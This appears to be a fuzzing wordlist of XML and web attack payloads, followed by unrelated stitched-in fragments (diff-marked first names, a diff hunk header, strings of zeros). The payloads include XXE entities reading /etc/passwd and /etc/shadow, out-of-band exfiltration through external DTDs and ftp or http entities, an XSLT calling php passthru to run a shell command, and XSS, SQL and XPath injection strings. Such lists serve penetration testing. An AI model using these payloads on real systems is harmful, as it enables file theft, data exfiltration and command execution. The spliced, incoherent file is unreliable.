 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]>
 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
 <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'>  "> %int;
 <!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>">
 <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >
 <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
 <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
 <![CDATA[<test></test>]]>
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><test></test>
 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
 <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
 <foo><![CDATA[' or 1=1 or ''=']]></foo>
 <foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
 <name>','')); phpinfo(); exit;/*</name>
 <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
 <test></test>
 <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
 <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
 <xml SRC="xsstest.xml" ID=I></xml>
 <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet>
 count(/child::node())
 x' or name()='username' or 'x'='y
 Agustin
 Ahmad
 Ahmed
-Aiden
 Al
 Alan
 Albert
 Branden
 Brandon
 Brant
-Brayden
 Brendan
 Brent
 Brenton
 Jame
 Jamel
 James
-Jameson
 Jamie
 Jan
 Jared
 Lester
 Levi
 Lewis
-Liam
 Lincoln
 Lindsey
 Linwood
`@@ -1,4 +1,3 @@`

	`00000000`	`00000000`
	`0000000`	`0000000`
	`000000`	`000000`